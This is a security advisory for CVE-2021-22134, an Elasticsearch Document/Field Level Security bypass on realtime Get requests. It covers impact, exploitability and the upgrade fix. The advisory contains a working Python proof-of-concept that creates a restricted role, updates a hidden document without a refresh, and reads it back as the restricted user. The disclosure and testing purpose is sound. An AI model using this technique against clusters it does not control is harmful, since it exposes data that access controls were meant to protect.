BIT-elasticsearch-2021-22134
Information Disclosure vulnerability in elasticsearch (Maven)
What is BIT-elasticsearch-2021-22134 About?
This vulnerability is an Information Disclosure flaw in Elasticsearch versions after 7.6.0 and before 7.11.0, specifically when Document or Field Level Security (DLS/FLS) is enabled. Get requests do not properly apply the configured security permissions when they target a document that has been updated but not yet refreshed in the index, so a user who is allowed to read the index but not that document (or some of its fields) can retrieve it. Exploitation requires an authenticated user with read access to the index and a request that hits the document inside the window between the update and the next refresh.
Affected Software
- org.elasticsearch:elasticsearch (Maven): versions >7.6.0 and <7.11.0 with Document or Field Level Security in use
Technical Details
The flaw exists in Elasticsearch in versions after 7.6.0 and before 7.11.0 when Document or Field Level Security (DLS/FLS) is in use. DLS/FLS is enforced on the searchable view of an index, which only reflects a write once the index has been refreshed. A 'Get' request is realtime by default and can serve a document that has been written but not yet refreshed; on the affected versions the DLS/FLS rules were not applied on that path. Consequently, a user with read privileges on the index can issue a 'Get' for a recently updated document and receive its contents (including fields FLS should have stripped, and documents DLS should have hidden), even though the same request after a refresh would be denied. Because DLS/FLS only exist when the security features are enabled, the requester is always an authenticated user; the bypass is of the per-document and per-field restrictions, not of index-level authorization.
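The following probe is an added example for this advisory, not code from Elasticsearch or from the advisory's authors. It reproduces the condition described above against a test cluster you control: it creates a role limited by a DLS query, indexes a document that role must not see, confirms the document is hidden after a refresh, updates it with refresh disabled, and reads it back as the restricted user. It also encodes the advisory's version range (>7.6.0, <7.11.0) in `is_affected`, which can be checked offline. Assumptions: an Elasticsearch 7.x cluster with security enabled and a license that permits Document Level Security (trial or platinum), reachable at the placeholder `BASE_URL` with the placeholder `ADMIN` credentials; the index, role and user names are placeholders chosen for the probe.

```python
"""Probe a test cluster for the CVE-2021-22134 DLS bypass on realtime GET.

Added example for this advisory; it is not Elasticsearch's own code.
Assumptions: an Elasticsearch 7.x cluster you control, with security
enabled and a license that allows Document Level Security (trial or
platinum), reachable at BASE_URL with ADMIN credentials. Index, role and
user names below are placeholders chosen for this probe.
"""
import base64
import json
import urllib.error
import urllib.request

AFFECTED_AFTER = (7, 6, 0)   # advisory: "after 7.6.0"
FIXED_IN = (7, 11, 0)        # advisory: "before 7.11.0"

BASE_URL = "http://localhost:9200"   # placeholder; use https with a proper CA in practice
ADMIN = ("elastic", "changeme")      # placeholder credentials
INDEX = "cve_2021_22134_probe"       # placeholder names for the probe artefacts
ROLE = "probe_reader"
USER = "probe_reader"
PASSWORD = "probe-pw-123456"


def parse_version(text):
    """'7.10.2-SNAPSHOT' -> (7, 10, 2); missing components default to 0."""
    parts = [int(p) for p in text.split("-", 1)[0].split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version):
    """True when the reported version lies in the range the advisory names."""
    return AFFECTED_AFTER < parse_version(version) < FIXED_IN


def _call(method, path, body=None, auth=ADMIN):
    """Minimal JSON REST call with HTTP basic auth; returns (status, json)."""
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(BASE_URL + path, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read() or b"{}")
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"{}")


def probe():
    """Index a DLS-hidden doc, update it without a refresh, GET it as the
    restricted user. Returns a dict; 'leaked' True means the bypass works."""
    _, info = _call("GET", "/")
    version = info["version"]["number"]

    # Disable automatic refresh so the "updated but not refreshed" window
    # is deterministic rather than a race against refresh_interval.
    _call("DELETE", f"/{INDEX}")
    _call("PUT", f"/{INDEX}", {
        "settings": {"index": {"refresh_interval": "-1"}},
        "mappings": {"properties": {"visibility": {"type": "keyword"}}},
    })
    # Role: read on the index, but only documents with visibility=public.
    _call("PUT", f"/_security/role/{ROLE}", {"indices": [{
        "names": [INDEX], "privileges": ["read"],
        "query": {"term": {"visibility": "public"}}}]})
    _call("PUT", f"/_security/user/{USER}", {"password": PASSWORD, "roles": [ROLE]})
    reader = (USER, PASSWORD)

    # Baseline: a refreshed secret document must be invisible to the reader.
    _call("PUT", f"/{INDEX}/_doc/1?refresh=true",
          {"visibility": "secret", "payload": "original"})
    _, before = _call("GET", f"/{INDEX}/_doc/1", auth=reader)

    # Update without refresh, then GET again as the restricted user.
    _call("POST", f"/{INDEX}/_update/1", {"doc": {"payload": "updated"}})
    _, after = _call("GET", f"/{INDEX}/_doc/1", auth=reader)

    # Clean up the probe artefacts regardless of outcome.
    _call("DELETE", f"/_security/user/{USER}")
    _call("DELETE", f"/_security/role/{ROLE}")
    _call("DELETE", f"/{INDEX}")

    return {
        "version": version,
        "version_in_range": is_affected(version),
        "baseline_hidden": not before.get("found", False),
        "leaked": bool(after.get("found")),
        "leaked_source": after.get("_source"),
    }


if __name__ == "__main__":
    print(json.dumps(probe(), indent=2))
```

A patched cluster reports `baseline_hidden: true` and `leaked: false`; a vulnerable one reports `leaked: true` with the updated `_source`. Run it only against a disposable test cluster: it creates and deletes a role, a user and an index with administrative credentials.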
What is the Impact of BIT-elasticsearch-2021-22134?
Successful exploitation allows an authenticated user with read access to an index to read documents, or fields within documents, that Document or Field Level Security was configured to hide from them. The result is unauthorized disclosure of data that the deployment's access-control policy was meant to protect; the flaw does not grant write access or access to indices the user is not already authorized to read.
What is the Exploitability of BIT-elasticsearch-2021-22134?
Exploitation of this Information Disclosure vulnerability requires an authenticated Elasticsearch user with read privileges on an index that is protected by Document or Field Level Security; DLS/FLS only exist when the security features are enabled, so the flaw is not reachable anonymously. Given that access, the attack is a plain 'Get' request for a document by ID, issued remotely over the REST API, so the technical complexity is low. What makes it timing-sensitive is that the request must land after a document is updated and before the index is refreshed. With the default refresh interval that window is about one second, but it grows on indices whose refresh interval has been raised for indexing throughput, and on 7.x an index that has not been searched recently can go idle and stop refreshing automatically, which widens the window further. The primary risk factor is therefore a frequently updated index containing restricted documents or fields, combined with users who legitimately hold read access to the index but not to all of its contents.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for BIT-elasticsearch-2021-22134?
Available Upgrade Options
- org.elasticsearch:elasticsearch
- >7.6.0, <7.11.0 → Upgrade to 7.11.0
Additional Resources
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.netapp.com/advisory/ntap-20210430-0006/
- https://nvd.nist.gov/vuln/detail/CVE-2021-22134
- https://osv.dev/vulnerability/GHSA-hwvv-438r-mhvj
- https://discuss.elastic.co/t/elastic-stack-7-11-0-security-update/265835
What are Similar Vulnerabilities to BIT-elasticsearch-2021-22134?
Similar Vulnerabilities: CVE-2021-44228 , CVE-2021-4104 , CVE-2021-22926 , CVE-2020-13939 , CVE-2020-1945
